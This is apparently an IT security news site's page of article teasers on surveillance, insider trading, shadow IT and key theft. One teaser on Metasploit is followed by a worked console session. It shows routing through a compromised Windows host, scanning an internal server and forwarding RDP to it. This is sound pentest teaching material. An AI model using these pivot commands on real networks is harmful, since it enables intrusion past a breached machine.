There has to be a better way

IT Security Insider

Top Stories

Conspiracy theorists and other concerned citizens will insist the government is watching every keystroke, keeping a record of every website, transaction, text and email. Shades of 1984’s Big Brother, right? These last few weeks the news has been brimming with revelations of data surveillance and monitoring by the government (not to mention data-harvesting corporations like Google, Yahoo, Facebook etc…). Everyone, including the security buffs at CloudAccess, is sensitive to what is being looked at, stored and analyzed for hazily defined purposes. Privacy is no longer as private as you think, and hasn’t been for many years. Politics, ethics and debates over 4th Amendment interpretation aside (they serve no useful purpose in this analysis), a question was asked on one of the security forums whether, in light of these alleged breaches of trust, cloud security... (more)

Test All Apps to Keep Hackers from Penetrating Castle Walls

Despite all the news about hackers infiltrating major corporations, most businesses continue to leave themselves woefully unprotected. Some surveys estimate more than 70% of businesses perform vulnerability tests on less than 10% of their cloud, mobile and web applications. A majority also confess they have been hacked at least once in the last two years. While most large businesses have begun application vulnerability testing, there is still a long way to go. After all, you are only as strong as your weakest link; hackers will undoubtedly find and attack any application without sufficient defenses. Although testing and creating protection for high-value and mission-critical applications is better than not doing anything at all, leaving low-priority applications unprotected is still a major risk. If hackers can exploit just one application, that means they can then ... (more)

Cybersecurity: It’s More Than Worms, Hacking and Phishing

To put things into perspective, consider an analogy with other information technology initiatives: accounting is like a lake, integration is like a bay, and cyber security is like the Pacific Ocean. The scope of understanding required to be a cyber security expert is so vast that it fills volumes just trying to define it, let alone protect it. The reason cyber security is so vast is that it is a strategy for mitigating the risk of breaches of confidentiality, integrity and availability across information systems and networks. Consider the number of threats that target these three properties, and then consider that this number covers only the known threats. Also, know that new threats are being uncovered daily. Moreover, threats are not all technological; some of them are socially engineered, which makes them all the more difficult to defend ... (more)

Microsoft Accuses Salesforce Recruit of Stealing Its Cloud Computing Plans

Remember that Microsoft guy that Salesforce hired, the one Microsoft sued to hold him to his non-compete? Well, last Thursday Microsoft told the Washington State Superior Court, which gave Microsoft its temporary restraining order a few weeks ago, that Matt Miszewski, whom Salesforce hired to run its global government CRM business (the same job he had at Microsoft), had stolen its cloud plans. It said that during discovery it found Miszewski in possession of 25,000 pages of its closely held 2011 sales strategies, internal playbooks, competitive analyses and marketing materials, and that when he resigned from Microsoft on December 31 he swore he was taking only personal property with him. The 900 files (600MB) were on his computer. Microsoft, which wants the restraining order turned into a preliminary injunction, told the court that Miszewski's employment at C... (more)

Ex-McKinsey Chief Charged as Galleon Tipster

On Tuesday the SEC filed civil charges against the secrets-laden former head of McKinsey & Co, Rajat Gupta, accusing him of leaking inside information to the notorious hedge fund trader Raj Rajaratnam, whose criminal trial for insider trading and securities fraud starts next week. Gupta allegedly tipped Rajaratnam to Warren Buffett's $5 billion Berkshire Hathaway investment in Goldman Sachs in 2008, at the height of the financial meltdown. Gupta was privy to what was going on by virtue of his seat on Goldman's board, and regulators say he told Rajaratnam the moment the board approved the deal via a conference call. Already informed by Gupta that the deal was in the works, Rajaratnam instantly bought another 175,000 shares of Goldman Sachs minutes before the market closed and sold them the next day, when the deal was announced and the shares went up. Gupta also supposedly leaked... (more)

Post Exploitation Using Metasploit Pivot and Port Forward

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and NOP sled generators can be mixed and matched with exploit modules to solve almost any exploit-related task. A very useful feature of Metasploit is the ability to pivot through a Meterpreter session into the network on the other side of the compromised host. This tutorial walks you through how this is done once you have a Meterpreter session on a remote box. We begin right after a client-side exploit has succeeded from an attacker machine running Ubuntu Linux against a victim machine running Windows XP. 1. Introduction The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and assists in performing a penet... (more)
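As an added illustration of the pivot and port forward the tutorial describes (this is not the tutorial's own session, and every address below is assumed: the attacker's Ubuntu box is 192.168.1.10, the compromised Windows XP host is dual-homed on 192.168.1.20 and 10.10.10.20, and 10.10.10.5 is an internal server the attacker cannot reach directly; the Meterpreter session is assumed to be session 1):

```console
# Inside the Meterpreter session: find out which networks the victim can see.
# The second interface (assumed 10.10.10.20) is the one we cannot reach from the attacker box.
meterpreter > ipconfig

# Drop back to msfconsole without killing the session, then tell the framework
# to send traffic for 10.10.10.0/24 through session 1.
meterpreter > background
msf > route add 10.10.10.0 255.255.255.0 1
msf > route print

# Framework modules now reach the internal subnet via the pivot.
# Here a TCP port scan of the assumed internal host 10.10.10.5.
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.10.10.5
msf auxiliary(tcp) > set PORTS 22,80,139,445,3389
msf auxiliary(tcp) > run

# The route only applies to Metasploit's own modules. To reach the internal
# host with a tool outside the framework, forward a local port on the
# attacker box through the session to the internal host.
msf > sessions -i 1
meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.5
meterpreter > portfwd list

# In a second terminal on the attacker box, the local port now leads to
# 10.10.10.5:3389 on the far side of the pivot.
rdesktop 127.0.0.1:3389
```

Two caveats worth knowing before relying on this: the route lives in msfconsole's routing table and disappears with the session, so re-add it (or use the post/multi/manage/autoroute module, which adds routes from the session's own interfaces) after reconnecting; and `portfwd` relays TCP only, so UDP-based services on the internal network are not reachable this way.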

Yahoo Investor Pegs Company as ‘Illogical Alice in Wonderland’

Yahoo said late Sunday that it has named three independent board members in an attempt to foil Third Point, its largest stockholder, from staging a proxy fight at the next stockholders meeting whenever that is. Third Point said it offered "several significant compromises to strike a deal and avoid a proxy contest. Today, the board has shown yet again that they are unable to execute deals that are in the company's best interests. Sadly for shareholders - who will once more bear the costs - the consequence of the board's refusal to accept Third Point's shareholder-friendly proposals will be a time-consuming and distracting proxy contest that the company can ill-afford....In the absence of independent shareholder oversight, the Yahoo boards of the past five years have given shareholders five CEOs and strategic plans in as many years and seriously damaged the value of th... (more)

Taking a Holistic Approach to IT Security

Welcome to the latest edition of the HP Discover Performance Podcast Series. Our next discussion examines how regional healthcare services provider Lake Health in Ohio has matured from deploying security technologies to becoming more of a comprehensive risk-reduction practice provider internally for its own consumers. We learn how Lake Health's Information Security Officer has been expanding the breadth and depth of risk management there to a more holistic level -- and we're even going to discuss how they've gone about deciding which risk and compliance services to seek from outside providers, and which to retain and keep on-premises. Here to explore these and other security-related enterprise IT issues, we're joined by our co-hosts for this sponsored podcast, Chief Software Evangelist at HP, Paul Muller, and Raf Los, Chief Security Evangelist at HP. And we also we... (more)

Shadow IT – The Reality Is Here

A recent survey has shown that security policies and rules set down by IT departments are not just being ignored but having a bus driven through them by staff and senior executives who wish to bring their own devices to work so that they can do more, work smarter and be in touch all of the time. The survey shows that almost three-quarters of respondents would not bet against their own organization having a data breach within the next 12 months. This, along with other responses, shows that the IT department of 2013 is a long way from the IT department of just five years ago, where what it said may not have been liked but was generally adhered to and, if it was not, sanctions could come into effect. Today's rise in BYOD means that every user is in effect his or her own IT department, able to bring in and out of the office just about any file they see fit. Even if an... (more)

Time to Ditch Cryptographic Keys?

What is the most secure way to authenticate electronic data? Until recently, many technical people would have answered 'cryptographic keys' without blinking. But recent headline events - and a 'biggie' last year - have raised serious doubts about the ability of cryptographic keys to protect vital government and corporate data. Here are two examples from February that should make CIOs, CTOs and CSOs tremble in their boardrooms: McAfee revoking the key it uses to sign its Mac apps; and stolen keys from Bit9 being used to sign malware. In the McAfee case, a McAfee administrator mistakenly revoked the digital key (and its certificate) used to sign the company's desktop apps for Apple's OS X, thereby creating serious problems for customers who wanted to install or upgrade Mac antivirus products. The original Ars Technica article (McAfee revoking keys) noted that the administrator intended ... (more)

The New Standard: Intelligence-Driven Security

In a recent blog post, Art Coviello, the executive chairman at RSA, posed an important question: how do we move from traditional security to intelligence-driven security? In his answer he argued that the increasingly interdependent exchanges between parties (B2C, B2B, B2P, etc.) have grown beyond the traditional means of securing the enterprise: “IT organizations have continued to construct security infrastructures around a disintegrating perimeter of increasingly ineffective controls.” He described a new model of cyber-security built on five concepts:

- A thorough understanding of risk
- The use of agile controls based on pattern recognition and predictive analytics
- The use of big data analytics to give context to vast streams of data and produce timely, actionable information
- Personnel with the right skill set to operate the systems
- Information sharing at scale

I hav... (more)